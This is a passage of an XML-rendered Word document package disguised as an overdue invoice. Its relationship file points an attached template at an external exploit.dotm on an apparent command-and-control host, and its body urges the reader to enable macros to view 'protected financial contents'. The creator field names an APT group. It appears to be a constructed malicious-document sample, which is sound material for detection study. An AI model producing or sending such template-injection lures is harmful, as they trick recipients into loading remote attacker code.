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attachedTemplate" Target="http://c2-infrastructure.malicious-domain.xyz/templates/exploit.dotm" TargetMode="External"/>
  <Relationship Id="rId2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r>
        <w:t>URGENT: Please enable macros to view protected financial contents.</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document>
</file>

<file path=docProps/core.xml><?xml version="1.0" encoding="utf-8"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <dc:title>Overdue Invoice #9401</dc:title>
  <dc:creator>APT Group 29</dc:creator>
</cp:coreProperties>
</file>